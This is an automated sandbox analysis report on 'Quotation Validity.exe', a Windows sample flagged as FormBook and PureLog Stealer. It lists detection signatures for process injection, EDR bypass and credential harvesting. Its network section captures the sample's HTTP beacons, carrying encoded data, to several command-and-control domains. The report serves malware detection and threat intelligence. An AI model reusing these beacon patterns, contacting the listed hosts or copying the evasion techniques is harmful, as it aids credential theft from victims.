Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation Validity.exe

Overview

General Information

Sample name:Quotation Validity.exe
Analysis ID:1566632
MD5:10f86c0378f3f9eabae2129174962df1
SHA1:177887de20bd548063d7df47baf2893d519341a7
SHA256:0ba8526b6a258a291665a487377351ede1601f0afcf74380556abbd789af669e
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Quotation Validity.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\Quotation Validity.exe" MD5: 10F86C0378F3F9EABAE2129174962DF1)
    • Quotation Validity.exe (PID: 7984 cmdline: "C:\Users\user\Desktop\Quotation Validity.exe" MD5: 10F86C0378F3F9EABAE2129174962DF1)
      • KnETAajUsFuuTQ.exe (PID: 6352 cmdline: "C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 5884 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • KnETAajUsFuuTQ.exe (PID: 6680 cmdline: "C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 736 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.Quotation Validity.exe.44324c8.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              2.2.Quotation Validity.exe.5e70000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                2.2.Quotation Validity.exe.5e70000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  2.2.Quotation Validity.exe.44324c8.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    9.2.Quotation Validity.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: Quotation Validity.exeAvira: detected
                      Multi AV Scanner detection for submitted file
                      Source: Quotation Validity.exeReversingLabs: Detection: 68%
                      Yara detected FormBook
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: Quotation Validity.exeJoe Sandbox ML: detected
                      Source: Quotation Validity.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation Validity.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: isoburn.pdb source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: isoburn.pdbGCTL source: Quotation Validity.exe, 00000009.00000002.1698898912.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730617348.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KnETAajUsFuuTQ.exe, 0000000B.00000002.3724874512.000000000056E000.00000002.00000001.01000000.0000000C.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771056364.000000000056E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Quotation Validity.exe, Quotation Validity.exe, 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1699007606.0000000004AD7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1706016321.0000000004C84000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02A5C4E0 FindFirstFileW,FindNextFileW,FindClose,12_2_02A5C4E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax12_2_02A49E40
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h12_2_04BD04F8

                      Networking

                      barindex
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.cyperla.xyz
                      Source: DNS query: www.070002018.xyz
                      Source: Joe Sandbox ViewIP Address: 146.88.233.115 146.88.233.115
                      Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                      Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 13:44:10 GMTserver: Apacheset-cookie: __tad=1733147050.6544345; expires=Thu, 30-Nov-2034 13:44:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 13:44:12 GMTserver: Apacheset-cookie: __tad=1733147052.6846258; expires=Thu, 30-Nov-2034 13:44:12 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 13:44:15 GMTserver: Apacheset-cookie: __tad=1733147055.5887323; expires=Thu, 30-Nov-2034 13:44:15 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                      Source: global trafficHTTP traffic detected: GET /qygv/?_jVx=rlV0_TQ81&6NVpdLF=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgueYbl0NkgEkN4ghVwMkIOvivrFpog== HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPppPRQa5ZmY++m+47QgCR+/iVNw4gjA==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ== HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /v89f/?6NVpdLF=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwLEpkgrXXmS6Zwq+X4n7/LWdMx9Q7w==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /8m07/?6NVpdLF=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWZvRz659dWh9F4TBV1031x6bEqu3dQ==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.goldstarfootwear.shopAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /6m2n/?6NVpdLF=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0ur9kqRkxGnQ62VRV775xzcXmQMlZyg==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.070002018.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /7yhf/?_jVx=rlV0_TQ81&6NVpdLF=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGro8YtWCJNiZpBxbyycKP3y6+8bNDuvw== HTTP/1.1Host: www.bienmaigrir.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /wu7k/?6NVpdLF=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP+ofPy3OtxFAtreRUZwpBdqa4QiZw9w==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.yc791022.asiaAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /ykgd/?_jVx=rlV0_TQ81&6NVpdLF=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/wtvWbtjylB0D75gbWHC72kMsIY/h9A== HTTP/1.1Host: www.jalan2.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /fbpt/?6NVpdLF=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw9U1Fq6zryNJuPCt39bkn3VWjex276Q==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.beyondfitness.liveAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /dm4p/?6NVpdLF=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AzFSQlsxYI3pCP4WG49cxd9TY9P6nbg==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.dietcoffee.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /qtfx/?6NVpdLF=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLKl2XaG/4RF1XL2skPecvq2g7m0aOng==&_jVx=rlV0_TQ81 HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                      Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                      Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                      Source: global trafficDNS traffic detected: DNS query: www.070002018.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.bienmaigrir.info
                      Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                      Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                      Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                      Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                      Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                      Source: global trafficDNS traffic detected: DNS query: www.alihones.lol
